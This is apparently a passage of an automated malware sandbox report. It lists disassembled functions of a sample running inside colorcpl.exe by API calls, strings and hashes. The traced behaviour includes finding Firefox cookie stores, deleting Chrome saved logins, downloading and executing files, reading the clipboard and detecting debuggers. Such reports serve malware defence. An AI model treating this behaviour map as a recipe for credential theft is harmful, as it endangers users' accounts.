                                                              • Instruction Fuzzy Hash: EC815A7520A345AFD708EB61D890EEFB7E8AFD4610F50481EF1924A150EF34AA09DB92
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000,?,?), ref: 0309B2DC
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?), ref: 0309B3AF
                                                              • FindClose.KERNEL32(00000000,?,?), ref: 0309B3BE
                                                              • FindClose.KERNEL32(00000000,?,?), ref: 0309B3E9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                              • API String ID: 1164774033-405221262
                                                              • Opcode ID: 21f3fa75f48fe484f5a89ae49f25e102a2a506c31e063a29f1926a0d8ed25109
                                                              • Instruction ID: cf8fbfb8d6efe5aabb9cb45dc3c3afeda1e742d5dd5173c2b6853564e0775091
                                                              • Opcode Fuzzy Hash: 21f3fa75f48fe484f5a89ae49f25e102a2a506c31e063a29f1926a0d8ed25109
                                                              • Instruction Fuzzy Hash: 8D31B335A023195FEF18F7A4EC94EEE777CAF90620F00055BE0169A091EFB4994AEA44
                                                              APIs
                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 030A29B8
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 030A29C4
                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 030A2CBA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A2CC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCloseCreateLibraryLoadProc
                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                              • API String ID: 1563625733-314212984
                                                              • Opcode ID: 7eeac889a447a86edc801ff4a60c021997f07c1899d6b0149fb5998c9b1d9128
                                                              • Instruction ID: 292c9eb9b056e986df70f6afa3b1f2785c3fb8b7fbd7bce1d3bfe9f99178127b
                                                              • Opcode Fuzzy Hash: 7eeac889a447a86edc801ff4a60c021997f07c1899d6b0149fb5998c9b1d9128
                                                              • Instruction Fuzzy Hash: 9AE1DB7AB073016BDE18F7B8EC65DEE76AD6FD1110F400E2EE5429F1D1EE258A049292
                                                              APIs
                                                              • _free.LIBCMT ref: 030D6741
                                                              • _free.LIBCMT ref: 030D6765
                                                              • _free.LIBCMT ref: 030D68EC
                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,030EC1E4), ref: 030D68FE
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,030FF754,000000FF,00000000,0000003F,00000000,?,?), ref: 030D6976
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,030FF7A8,000000FF,?,0000003F,00000000,?), ref: 030D69A3
                                                              • _free.LIBCMT ref: 030D6AB8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                              • String ID:
                                                              • API String ID: 314583886-0
                                                              • Opcode ID: c76ea5478f466685a9fd0c673f0a5f187ef8883af9f309d09b9560f887b8ca1b
                                                              • Instruction ID: 2751e3b37fadac0d0f7f4c779267a509d0511434630f6db2d099f3cef644790d
                                                              • Opcode Fuzzy Hash: c76ea5478f466685a9fd0c673f0a5f187ef8883af9f309d09b9560f887b8ca1b
                                                              • Instruction Fuzzy Hash: 99C10775A0234DAFDB24EF78D844AAEFBFCEF41210F9841AED4959B240E7369941CB50
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0309A98F
                                                              • GetLastError.KERNEL32 ref: 0309A999
                                                              Strings
                                                              • [Chrome StoredLogins not found], xrefs: 0309A9B3
                                                              • UserProfile, xrefs: 0309A95F
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0309A95A
                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0309A9BF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                              • API String ID: 2018770650-1062637481
                                                              • Opcode ID: eed1bdeeee2dbfab12d843fcc532fd4aed288af3386cb150e88de81ec4082fcf
                                                              • Instruction ID: 1aadae19ab77d09922ddbed7c3ec288688a722075c4f19d434ac787b4832368a
                                                              • Opcode Fuzzy Hash: eed1bdeeee2dbfab12d843fcc532fd4aed288af3386cb150e88de81ec4082fcf
                                                              • Instruction Fuzzy Hash: F0014E35B8720C6FEF44FBB4EC278FEB72CBEA1410B40015BE0025F682EE02950496C2
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 03098393
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309842F
                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0309848D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 030984E5
                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 030984FC
                                                              • FindClose.KERNEL32(00000000), ref: 030986F4
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrow
                                                              • String ID:
                                                              • API String ID: 242384754-0
                                                              • Opcode ID: 2ac7b69dfb4f07a02ffe2f8759c06511020d13239b68d306d48a02a0832ce687
                                                              • Instruction ID: 848b987bc507919169e18c5e6b330f2eb642b7e5379646f36f971ef6e27677db
                                                              • Opcode Fuzzy Hash: 2ac7b69dfb4f07a02ffe2f8759c06511020d13239b68d306d48a02a0832ce687
                                                              • Instruction Fuzzy Hash: 5FB18F3690220DAFEF18FBA0DC91AEDB378AF95210F00415BE516AF191EF345B49DB50
                                                              APIs
                                                                • Part of subcall function 030A0201: SetLastError.KERNEL32(0000000D,030A0781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,030A075F), ref: 030A0207
                                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,030A075F), ref: 030A079C
                                                              • GetNativeSystemInfo.KERNEL32(?,0309BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,030A075F), ref: 030A080A
                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 030A082E
                                                                • Part of subcall function 030A0708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,030A084C,?,00000000,00003000,00000004,00000000,?,?), ref: 030A0718
                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 030A0875
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 030A087C
                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 030A098F
                                                                • Part of subcall function 030A0ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,030A099C,?,?,?,?,?), ref: 030A0B4C
                                                                • Part of subcall function 030A0ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 030A0B53
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                              • String ID:
                                                              • API String ID: 3950776272-0
                                                              • Opcode ID: c3fee6f674210480fff3614bd3e9ac9aa6e3060ca0edaca5c05003624f095539
                                                              • Instruction ID: 8f5a43037e9afdce18bf1d214ab84b7b16eed83274edc4c3b0487ba9de326bc3
                                                              • Opcode Fuzzy Hash: c3fee6f674210480fff3614bd3e9ac9aa6e3060ca0edaca5c05003624f095539
                                                              • Instruction Fuzzy Hash: 5061F474602B19ABD790EFADE880B6F7BE9BF84751F084118E9458B281DB74D840CBD1
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,030A8656,00000000), ref: 030A8A09
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,030A8656,00000000), ref: 030A8A1E
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,030A8656,00000000), ref: 030A8A2B
                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,030A8656,00000000), ref: 030A8A36
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,030A8656,00000000), ref: 030A8A48
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,030A8656,00000000), ref: 030A8A4B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                              • String ID:
                                                              • API String ID: 276877138-0
                                                              • Opcode ID: 916a2ce6d88f99553a2785bf76140888d6e887fae5454348a579c7661b5fc196
                                                              • Instruction ID: 9f8503e6e8daa375d07dff7daeccd4b41c3762d54d8e0ebd8dd408b947d52a9c
                                                              • Opcode Fuzzy Hash: 916a2ce6d88f99553a2785bf76140888d6e887fae5454348a579c7661b5fc196
                                                              • Instruction Fuzzy Hash: 5CF089752432396FE611FB64BC88DBF2FACDF95BA2B000456F4059A1408B698D49A571
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,030DF93B,?,00000000), ref: 030DF6B5
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,030DF93B,?,00000000), ref: 030DF6DE
                                                              • GetACP.KERNEL32(?,?,030DF93B,?,00000000), ref: 030DF6F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 41861c7c9930548fd5b5c236fd0d5fb4ee866043d791cf0e54e91fbc7ec417ff
                                                              • Instruction ID: f50d283528aef3534330b07e26900a55676d8441aaec846486bbad1f319ec92a
                                                              • Opcode Fuzzy Hash: 41861c7c9930548fd5b5c236fd0d5fb4ee866043d791cf0e54e91fbc7ec417ff
                                                              • Instruction Fuzzy Hash: 0121B622702307AAD770DF65D900A9BB3EAEF44E54B5EC4A4E94BDB924E732D940C750
                                                              APIs
                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 030A94A4
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0309DD9E), ref: 030A94B8
                                                              • LockResource.KERNEL32(00000000,?,?,?,0309DD9E), ref: 030A94BF
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0309DD9E), ref: 030A94CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID: SETTINGS
                                                              • API String ID: 3473537107-594951305
                                                              • Opcode ID: 63ec66361c90ab3ad370a2c429d124c0c908f79b1de3f472d02d02c4fc6ee720
                                                              • Instruction ID: ab611aa5f827f2bdfd02ba0ce22b236795489188083eeb8142788d25863d15af
                                                              • Opcode Fuzzy Hash: 63ec66361c90ab3ad370a2c429d124c0c908f79b1de3f472d02d02c4fc6ee720
                                                              • Instruction Fuzzy Hash: 39E01279302315AFC7223BA9B88CD177E65E7D5B527080054F65186609CF3A8C00CA10
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 030987A5
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0309881D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 03098846
                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0309885D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                              • String ID:
                                                              • API String ID: 1157919129-0
                                                              • Opcode ID: 761da3edf19236a5e10aafe0c8c5150ef557970f10d5e2e010590142f13d396f
                                                              • Instruction ID: f9a7cb041c7a0ffb213fb2a29ab89dcd17df1fc74b717c1c49b71b2bb90169fb
                                                              • Opcode Fuzzy Hash: 761da3edf19236a5e10aafe0c8c5150ef557970f10d5e2e010590142f13d396f
                                                              • Instruction Fuzzy Hash: 2081533690221D9FEF19FBA0DC90DEDB3B8AF95210F14466BD416AB190EF305B49EB50
                                                              APIs
                                                                • Part of subcall function 030D5725: GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D575C
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
                                                                • Part of subcall function 030D5725: _abort.LIBCMT ref: 030D57A3
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D5784
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D5791
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 030DF8FC
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 030DF957
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 030DF966
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,030D1F7E,00000040,?,030D209E,00000055,00000000,?,?,00000055,00000000), ref: 030DF9AE
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,030D1FFE,00000040), ref: 030DF9CD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                              • String ID:
                                                              • API String ID: 745075371-0
                                                              • Opcode ID: 160e300a4f29bdb1dbfacc8f7120a2e828428d33017d64ba09a0a7ef9e0dfeff
                                                              • Instruction ID: 4d9552bff25ed5f023705c568011f813e01a549c1078fbe2efe5610a7d5617e8
                                                              • Opcode Fuzzy Hash: 160e300a4f29bdb1dbfacc8f7120a2e828428d33017d64ba09a0a7ef9e0dfeff
                                                              • Instruction Fuzzy Hash: 26516375E0230BAFEB50EFA5DC44ABEF7F8AF44700F088469E916EB190D7719A508761
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0309784D
                                                              • FindFirstFileW.KERNEL32(00000000,?,030F32A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03097906
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309792E
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0309793B
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03097A51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                              • String ID:
                                                              • API String ID: 1771804793-0
                                                              • Opcode ID: 163a86c897ca79b0abadded7a444d42e41c35c17150b7a96bcc44d96f1065b79
                                                              • Instruction ID: f6562b23587985c1f0bbb8ff069124c7ec4d3c35596de4b3814ae9b2143c34af
                                                              • Opcode Fuzzy Hash: 163a86c897ca79b0abadded7a444d42e41c35c17150b7a96bcc44d96f1065b79
                                                              • Instruction Fuzzy Hash: 6F519376A0230DABDF04FBA4DC559ED77BCAF91200F40455BE806AB191EF349B49DB90
                                                              APIs
                                                                • Part of subcall function 030A9F23: GetCurrentProcess.KERNEL32(?,?,?,0309C663,WinDir,00000000,00000000), ref: 030A9F34
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0309E305
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0309E329
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0309E338
                                                              • CloseHandle.KERNEL32(00000000), ref: 0309E4EF
                                                                • Part of subcall function 030A9F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0309DFB9,00000000,?,?,00000001), ref: 030A9F66
                                                                • Part of subcall function 030A9F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 030A9F9C
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0309E4E0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 1735047541-0
                                                              • Opcode ID: dd270eca539938fab2380636af8636a1442302dc4496233afc87cce4e9086c15
                                                              • Instruction ID: f99216a016f341ebde700a6ccba38606d7aed44692a183bbe7203cf4d4c176a8
                                                              • Opcode Fuzzy Hash: dd270eca539938fab2380636af8636a1442302dc4496233afc87cce4e9086c15
                                                              • Instruction Fuzzy Hash: 3041463520A3499BD738FB64D860AEFF3D8AFD4300F50492EE44E8A191EF30990AD752
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 030964D2
                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 030965B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DownloadExecuteFileShell
                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$open
                                                              • API String ID: 2825088817-1189844230
                                                              • Opcode ID: 45ab79230c6216621184c04b25b4351d62aa7632fdeed314370676cbbaac4c07
                                                              • Instruction ID: 7005d9a105fc2b32bf8fd4feed7950b387dbfe2d7143269e8053e6f815fc7f8a
                                                              • Opcode Fuzzy Hash: 45ab79230c6216621184c04b25b4351d62aa7632fdeed314370676cbbaac4c07
                                                              • Instruction Fuzzy Hash: 7F6106397063096FEE18FBB4C865AFE77A99FD1520F00095FE5429F1D1EF218A08E252
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 030AA861
                                                                • Part of subcall function 030A215F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,030F30C0), ref: 030A216E
                                                                • Part of subcall function 030A215F: RegSetValueExA.KERNEL32(030F30C0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A2196
                                                                • Part of subcall function 030A215F: RegCloseKey.KERNEL32(030F30C0,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A21A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                              • API String ID: 4127273184-3576401099
                                                              • Opcode ID: fece7682a97996d78b1ef29f0a0fd233996df34b01688cc3cb96b9e3ef37f454
                                                              • Instruction ID: a67e5e857ca8c826b8467fe6da7da6df76f6c474c044948bf94bbbe472dc10dc
                                                              • Opcode Fuzzy Hash: fece7682a97996d78b1ef29f0a0fd233996df34b01688cc3cb96b9e3ef37f454
                                                              • Instruction Fuzzy Hash: B511B725F837043FE818B5BD5D6BBAF281993C6A60F450559E7122FAC7D5C24642C3C6
                                                              APIs
                                                                • Part of subcall function 030D5725: GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D575C
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
                                                                • Part of subcall function 030D5725: _abort.LIBCMT ref: 030D57A3
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,030D1F85,?,?,?,?,030D19DC,?,00000004), ref: 030DEF9A
                                                              • _wcschr.LIBVCRUNTIME ref: 030DF02A
                                                              • _wcschr.LIBVCRUNTIME ref: 030DF038
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,030D1F85,00000000,030D20A5), ref: 030DF0DB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                              • String ID:
                                                              • API String ID: 4212172061-0
                                                              • Opcode ID: 985a8c9bf8969d27e39efbf8950e36b6c32b786bc47d1a4e9f17e4c56e7a4c94
                                                              • Instruction ID: 60d93228ddb331dfd3f7977769427e2d1a86da44bb2f16c0d87d27bc4c1120a7
                                                              • Opcode Fuzzy Hash: 985a8c9bf8969d27e39efbf8950e36b6c32b786bc47d1a4e9f17e4c56e7a4c94
                                                              • Instruction Fuzzy Hash: 1761D639602706AADB24FB35DC45BAAB7ECEF44750F184469E91ADF180EB74E940C760
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 030C99A4
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 030C99AE
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 030C99BB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 385bbae1be2bbf120bfb16599f58bda85bc67dc4ebe8e9331ce56274f9ea20f7
                                                              • Instruction ID: 2a36d71346f57c542bff15c7b596689fdb0eb2e1f369f252de34c9d81a5d77fc
                                                              • Opcode Fuzzy Hash: 385bbae1be2bbf120bfb16599f58bda85bc67dc4ebe8e9331ce56274f9ea20f7
                                                              • Instruction Fuzzy Hash: B231B47591221C9BCB61EF69D8887CDB7B8FF58310F5041EAE40CAB250E7349B858F45
                                                              APIs
                                                              • OpenClipboard.USER32(00000000), ref: 0309A65D
                                                              • GetClipboardData.USER32(0000000D), ref: 0309A669
                                                              • CloseClipboard.USER32 ref: 0309A671
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$CloseDataOpen
                                                              • String ID:
                                                              • API String ID: 2058664381-0
                                                              • Opcode ID: 3a389912a397da8992e695e15072fe5180b7cbbd65ca7086f6a1e010be76faca
                                                              • Instruction ID: d8c9dbf5fd9f1250113854ec85cabf3d0c1c72cc3729523e82153890c07501ba
                                                              • Opcode Fuzzy Hash: 3a389912a397da8992e695e15072fe5180b7cbbd65ca7086f6a1e010be76faca
                                                              • Instruction Fuzzy Hash: B7E0C2307473249BEA20EB70F808B8EB7949FA0F21F05451AB41D9E148CB749800DBA8
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,030C262F), ref: 030C2901
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 516ec3e50dbc80bc6cb4a46c9f7aaaf7d34b82bf177f8d08db4470dd00de78cf
                                                              • Instruction ID: b02d95c9822a52b3e10d13ce37e6ab7aa0f9b86ec828b42c17c3845ea1babb6a
                                                              • Opcode Fuzzy Hash: 516ec3e50dbc80bc6cb4a46c9f7aaaf7d34b82bf177f8d08db4470dd00de78cf
                                                              • Instruction Fuzzy Hash:
                                                              APIs
